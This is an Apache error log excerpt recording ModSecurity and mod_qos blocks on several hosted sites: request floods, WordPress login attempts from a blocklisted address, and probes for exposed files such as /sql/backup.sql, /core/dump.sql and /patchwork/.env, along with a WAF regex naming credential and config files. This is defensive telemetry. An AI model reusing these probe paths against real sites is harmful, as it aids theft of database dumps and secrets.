[Tue May 26 19:54:55.323339 2026] [security2:error] [pid 93576:tid 93755] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNWDRMqfxdEDkoszUaQAAACs"]
[Tue May 26 19:54:55.331197 2026] [security2:error] [pid 93868:tid 94282] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNUqK9k_ZUB2Vp25MtQAAAac"]
[Tue May 26 19:54:55.351920 2026] [security2:error] [pid 93576:tid 93791] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNmDRMqfxdEDkoszUeQAAAE8"]
[Tue May 26 19:54:55.353790 2026] [security2:error] [pid 93868:tid 94271] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNkqK9k_ZUB2Vp25MyAAAAZw"]
[Tue May 26 19:54:55.354912 2026] [security2:error] [pid 86490:tid 86716] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNVZMwN0DpLVWo6LH9QAAAOU"]
[Tue May 26 19:54:55.358138 2026] [security2:error] [pid 93868:tid 94340] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNkqK9k_ZUB2Vp25MzwAAAeE"]
[Tue May 26 19:54:55.377812 2026] [security2:error] [pid 93868:tid 94362] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNkqK9k_ZUB2Vp25M0QAAAfc"]
[Tue May 26 19:54:55.384117 2026] [security2:error] [pid 86490:tid 86711] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNlZMwN0DpLVWo6LIKwAAAOA"]
[Tue May 26 19:54:55.385916 2026] [security2:error] [pid 93576:tid 93819] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNmDRMqfxdEDkoszUggAAAGs"]
[Tue May 26 19:54:55.386076 2026] [security2:error] [pid 86490:tid 86642] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNVZMwN0DpLVWo6LH7QAAAJs"]
[Tue May 26 19:54:55.404161 2026] [security2:error] [pid 93576:tid 93748] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNmDRMqfxdEDkoszUfgAAACQ"]
[Tue May 26 19:54:55.409590 2026] [security2:error] [pid 93868:tid 94267] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNkqK9k_ZUB2Vp25M1AAAAZg"]
[Tue May 26 19:54:55.411205 2026] [security2:error] [pid 93868:tid 94310] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNkqK9k_ZUB2Vp25M4QAAAcM"]
[Tue May 26 19:54:55.416112 2026] [security2:error] [pid 93576:tid 93827] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNmDRMqfxdEDkoszUhAAAAHM"]
[Tue May 26 19:54:55.419722 2026] [security2:error] [pid 93576:tid 93789] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNmDRMqfxdEDkoszUhQAAAE0"]
[Tue May 26 19:54:55.422080 2026] [security2:error] [pid 93576:tid 93811] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNmDRMqfxdEDkoszUgwAAAGM"]
[Tue May 26 19:54:55.424422 2026] [security2:error] [pid 93868:tid 94293] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNkqK9k_ZUB2Vp25M2gAAAbI"]
[Tue May 26 19:54:55.433334 2026] [security2:error] [pid 93868:tid 94344] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNkqK9k_ZUB2Vp25MzQAAAeU"]
[Tue May 26 19:54:55.435897 2026] [security2:error] [pid 93868:tid 94299] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNkqK9k_ZUB2Vp25M2wAAAbg"]
[Tue May 26 19:54:55.442539 2026] [security2:error] [pid 93576:tid 93772] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNmDRMqfxdEDkoszUigAAADw"]
[Tue May 26 19:54:55.448806 2026] [security2:error] [pid 86490:tid 86683] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNlZMwN0DpLVWo6LIOwAAAMQ"]
[Tue May 26 19:54:55.458144 2026] [security2:error] [pid 93576:tid 93839] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNmDRMqfxdEDkoszUhgAAAH8"]
[Tue May 26 19:54:55.803697 2026] [security2:error] [pid 86490:tid 86592] [remote 49.12.3.147:51040] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.3.12.49.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWtN1ZMwN0DpLVWo6LIhwAArmU"]
[Tue May 26 19:54:55.843939 2026] [security2:error] [pid 86490:tid 86632] [client 185.177.72.53:56282] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/sql/backup.sql"] [unique_id "ahWtN1ZMwN0DpLVWo6LIiQAAAJE"]
[Tue May 26 19:54:55.956718 2026] [qos:error] [pid 86490:tid 86720] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtN1ZMwN0DpLVWo6LIvQAAAOk
[Tue May 26 19:54:55.958206 2026] [qos:error] [pid 86490:tid 86671] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtN1ZMwN0DpLVWo6LIvgAAALg
[Tue May 26 19:54:55.960004 2026] [qos:error] [pid 86490:tid 86723] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtN1ZMwN0DpLVWo6LIwQAAAOw
[Tue May 26 19:54:55.963196 2026] [qos:error] [pid 86490:tid 86664] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtN1ZMwN0DpLVWo6LIwwAAALE
[Tue May 26 19:54:56.041070 2026] [qos:error] [pid 86490:tid 86704] [client 45.148.10.120:49344] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtOFZMwN0DpLVWo6LIyAAAANk
[Tue May 26 19:54:56.043353 2026] [qos:error] [pid 93868:tid 94336] [client 45.148.10.120:56886] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtOEqK9k_ZUB2Vp25NKAAAAd0
[Tue May 26 19:54:56.046642 2026] [qos:error] [pid 86490:tid 86684] [client 45.148.10.120:60196] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtOFZMwN0DpLVWo6LIyQAAAMU
[Tue May 26 19:54:56.050554 2026] [qos:error] [pid 86490:tid 86653] [client 45.148.10.120:35238] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtOFZMwN0DpLVWo6LIygAAAKY
[Tue May 26 19:54:56.167730 2026] [security2:error] [pid 86490:tid 86632] [client 185.177.72.53:56282] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/core/dump.sql"] [unique_id "ahWtOFZMwN0DpLVWo6LIzAAAAJE"]
[Tue May 26 19:54:56.229420 2026] [qos:error] [pid 93868:tid 94279] [client 45.148.10.120:43360] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtOEqK9k_ZUB2Vp25NKgAAAaQ
[Tue May 26 19:54:56.241898 2026] [qos:error] [pid 93868:tid 94378] [client 45.148.10.120:43364] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtOEqK9k_ZUB2Vp25NKwAAAgc
[Tue May 26 19:54:56.279025 2026] [security2:error] [pid 93868:tid 94295] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNkqK9k_ZUB2Vp25M2QAAAbQ"]
[Tue May 26 19:54:56.280192 2026] [security2:error] [pid 86490:tid 86689] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNlZMwN0DpLVWo6LIMQAAAMo"]
[Tue May 26 19:54:56.283987 2026] [security2:error] [pid 86490:tid 86639] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNlZMwN0DpLVWo6LINgAAAJg"]
[Tue May 26 19:54:56.285316 2026] [security2:error] [pid 86490:tid 86745] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNlZMwN0DpLVWo6LIMAAAAQI"]
[Tue May 26 19:54:56.290830 2026] [security2:error] [pid 93576:tid 93821] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNmDRMqfxdEDkoszUiAAAAG0"]
[Tue May 26 19:54:56.299957 2026] [security2:error] [pid 93868:tid 94306] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNkqK9k_ZUB2Vp25M5QAAAb8"]
[Tue May 26 19:54:56.312956 2026] [security2:error] [pid 93576:tid 93759] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNmDRMqfxdEDkoszUkwAAAC8"]
[Tue May 26 19:54:56.329453 2026] [security2:error] [pid 86490:tid 86698] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNlZMwN0DpLVWo6LIPgAAANM"]
[Tue May 26 19:54:56.329596 2026] [security2:error] [pid 86490:tid 86664] [client 185.177.72.53:56282] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/patchwork/.env"] [unique_id "ahWtOFZMwN0DpLVWo6LI0wAAALE"]
[Tue May 26 19:54:56.330783 2026] [security2:error] [pid 93576:tid 93754] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNmDRMqfxdEDkoszUlwAAACo"]
[Tue May 26 19:54:56.332059 2026] [security2:error] [pid 93576:tid 93726] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNmDRMqfxdEDkoszUkQAAAA4"]
[Tue May 26 19:54:56.334808 2026] [security2:error] [pid 86490:tid 86728] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNlZMwN0DpLVWo6LINwAAAPE"]
[Tue May 26 19:54:56.343900 2026] [security2:error] [pid 86490:tid 86663] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNlZMwN0DpLVWo6LIPwAAALA"]
[Tue May 26 19:54:56.349013 2026] [security2:error] [pid 86490:tid 86665] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNlZMwN0DpLVWo6LIQwAAALI"]
[Tue May 26 19:54:56.352260 2026] [security2:error] [pid 86490:tid 86746] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtN1ZMwN0DpLVWo6LIeAAAAQM"]
[Tue May 26 19:54:56.361982 2026] [security2:error] [pid 86490:tid 86705] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNlZMwN0DpLVWo6LIWQAAANo"]
[Tue May 26 19:54:56.369438 2026] [security2:error] [pid 93868:tid 94312] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtN0qK9k_ZUB2Vp25NCgAAAcU"]
[Tue May 26 19:54:56.375406 2026] [security2:error] [pid 93868:tid 94304] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtN0qK9k_ZUB2Vp25NEQAAAb0"]
[Tue May 26 19:54:56.378537 2026] [security2:error] [pid 86490:tid 86747] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNlZMwN0DpLVWo6LISAAAAQQ"]
[Tue May 26 19:54:56.379772 2026] [security2:error] [pid 86490:tid 86696] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtN1ZMwN0DpLVWo6LIcgAAANE"]
[Tue May 26 19:54:56.408736 2026] [security2:error] [pid 86490:tid 86697] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtN1ZMwN0DpLVWo6LIkwAAANI"]
[Tue May 26 19:54:56.410553 2026] [security2:error] [pid 93868:tid 94376] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtN0qK9k_ZUB2Vp25NEgAAAgU"]
[Tue May 26 19:54:56.417679 2026] [security2:error] [pid 86490:tid 86692] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtN1ZMwN0DpLVWo6LIewAAAM0"]
[Tue May 26 19:54:56.419654 2026] [security2:error] [pid 93576:tid 93829] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtN2DRMqfxdEDkoszUpgAAAHU"]
[Tue May 26 19:54:56.423874 2026] [security2:error] [pid 93868:tid 94347] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtN0qK9k_ZUB2Vp25NGwAAAeg"]
[Tue May 26 19:54:56.424276 2026] [security2:error] [pid 86490:tid 86633] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNlZMwN0DpLVWo6LIQgAAAJI"]
[Tue May 26 19:54:56.424889 2026] [security2:error] [pid 86490:tid 86719] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtN1ZMwN0DpLVWo6LIjQAAAOg"]
[Tue May 26 19:54:56.425127 2026] [security2:error] [pid 86490:tid 86727] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtN1ZMwN0DpLVWo6LIggAAAPA"]
[Tue May 26 19:54:56.431313 2026] [security2:error] [pid 93576:tid 93730] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtN2DRMqfxdEDkoszUqAAAABI"]
[Tue May 26 19:54:56.433959 2026] [security2:error] [pid 93576:tid 93779] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtN2DRMqfxdEDkoszUoAAAAEM"]
[Tue May 26 19:54:56.447865 2026] [security2:error] [pid 93868:tid 94350] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtN0qK9k_ZUB2Vp25NEwAAAes"]
[Tue May 26 19:54:56.455920 2026] [security2:error] [pid 93868:tid 94348] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtN0qK9k_ZUB2Vp25NGAAAAek"]
[Tue May 26 19:54:56.494037 2026] [security2:error] [pid 86490:tid 86556] [remote 49.12.3.147:51040] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.3.12.49.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWtOFZMwN0DpLVWo6LI2AABAUE"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:54:56.580375 2026] [qos:error] [pid 93576:tid 93783] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtOGDRMqfxdEDkoszUzwAAAEc
[Tue May 26 19:54:56.580762 2026] [qos:error] [pid 93868:tid 94265] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtOEqK9k_ZUB2Vp25NTwAAAZY
[Tue May 26 19:54:56.584326 2026] [qos:error] [pid 86490:tid 86687] [client 45.148.10.120:34958] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtOFZMwN0DpLVWo6LI_gAAAMg
[Tue May 26 19:54:56.584354 2026] [qos:error] [pid 93576:tid 93729] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWtOGDRMqfxdEDkoszU0QAAABE
[Tue May 26 19:54:56.584535 2026] [qos:error] [pid 93868:tid 94310] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtOEqK9k_ZUB2Vp25NUAAAAcM
[Tue May 26 19:54:56.584862 2026] [qos:error] [pid 93868:tid 94332] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtOEqK9k_ZUB2Vp25NUQAAAdk
[Tue May 26 19:54:56.596899 2026] [qos:error] [pid 93576:tid 93721] [client 45.148.10.120:43372] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtOGDRMqfxdEDkoszU1AAAAAk
[Tue May 26 19:54:56.599416 2026] [qos:error] [pid 93868:tid 94301] [client 45.148.10.120:60186] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtOEqK9k_ZUB2Vp25NVAAAAbo
[Tue May 26 19:54:56.609238 2026] [qos:error] [pid 86490:tid 86714] [client 45.148.10.120:49406] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtOFZMwN0DpLVWo6LJAgAAAOM
